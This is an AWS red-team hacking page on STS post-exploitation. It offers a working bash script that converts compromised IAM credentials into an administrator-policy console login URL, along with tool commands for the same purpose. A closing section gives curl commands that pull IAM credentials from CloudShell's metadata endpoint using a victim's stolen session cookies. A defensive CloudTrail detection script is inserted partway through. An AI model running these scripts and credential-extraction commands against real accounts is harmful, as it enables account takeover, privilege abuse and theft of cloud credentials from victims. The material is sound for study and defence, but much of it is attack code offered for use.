AWS - STS Post Exploitation

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE). Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

STS

For more information:

AWS - IAM, Identity Center & SSO Enum

From IAM Creds to Console

If you have managed to obtain some IAM credentials, you might be interested in accessing the web console using the following tools. Note that the user/role must have the sts:GetFederationToken permission.

Custom script

The following script uses the default profile and the default AWS partition (not gov and not cn) to give you a signed URL that you can use to log in to the web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?   # capture the exit status before any other command overwrites $?

if [ "$status" -ne 0 ]; then
    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
    exit "$status"
fi

# Parse the output (quote $output so jq receives the JSON unchanged)
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string expected by the federation endpoint
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
    --get \
    --data-urlencode "Action=getSigninToken" \
    --data-urlencode "SessionDuration=43200" \
    --data-urlencode "Session=$json_creds"
)
# Extract the token and URL-encode it for use as a query parameter
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

You can generate a web console link with https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Make sure the IAM user has the sts:GetFederationToken permission, or provide a role to assume.

aws-vault

aws-vault is a tool to securely store and access AWS credentials in a development environment.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

You can also use aws-vault to obtain a browser console session.
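All three console-access paths above go through sts:GetFederationToken followed by a federated ConsoleLogin, both of which land in CloudTrail. The following detection logic is an added example (not code from the page or from any of the tools it lists); the CloudTrail records are constructed samples whose field layout (eventSource, eventName, userIdentity, requestParameters.policyArns) is assumed from the CloudTrail record format, and the rule names and severities are my own.

```python
# Constructed CloudTrail-style records (sample data, not real account logs).
SAMPLE_EVENTS = [
    {"eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"name": "consoler", "durationSeconds": 43200,
                           "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]}},
    {"eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": {"type": "FederatedUser", "userName": "consoler"},
     "sourceIPAddress": "198.51.100.7"},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "sourceIPAddress": "203.0.113.5"},
]


def find_federation_findings(events):
    """Flag GetFederationToken calls (high if an admin policy is attached)
    and console logins performed by a federated user."""
    findings = []
    for ev in events:
        name = ev.get("eventName")
        ident = ev.get("userIdentity") or {}
        if ev.get("eventSource") == "sts.amazonaws.com" and name == "GetFederationToken":
            params = ev.get("requestParameters") or {}
            arns = [p.get("arn", "") for p in params.get("policyArns", [])]
            severity = "high" if any(a.endswith("/AdministratorAccess") for a in arns) else "medium"
            findings.append({"rule": "sts-get-federation-token", "severity": severity,
                             "user": ident.get("userName"), "federated_name": params.get("name"),
                             "policy_arns": arns, "ip": ev.get("sourceIPAddress")})
        elif name == "ConsoleLogin" and ident.get("type") == "FederatedUser":
            findings.append({"rule": "federated-console-login", "severity": "medium",
                             "user": ident.get("userName"), "ip": ev.get("sourceIPAddress")})
    return findings


def correlate_token_to_login(findings):
    """Pair a GetFederationToken with a later federated login that reuses its
    federated name from the same source IP: the full IAM-creds-to-console chain."""
    chains = []
    for i, tok in enumerate(findings):
        if tok["rule"] != "sts-get-federation-token":
            continue
        for login in findings[i + 1:]:
            if (login["rule"] == "federated-console-login"
                    and login["user"] == tok["federated_name"] and login["ip"] == tok["ip"]):
                chains.append({"iam_user": tok["user"], "federated_name": tok["federated_name"],
                               "ip": tok["ip"], "severity": "critical"})
    return chains


if __name__ == "__main__":
    for c in correlate_token_to_login(find_federation_findings(SAMPLE_EVENTS)):
        print(c)
```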

From Console to IAM Creds

Originally discovered in this post: if you manage to get access to the web console (perhaps you stole cookies and could not reach the .aws folder), you can obtain IAM tokens for that user via CloudShell.

CloudShell exposes IAM credentials through an undocumented endpoint on port 1338. After loading the victim's session cookies into your browser, you can open CloudShell and issue the following commands to obtain the IAM credentials.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
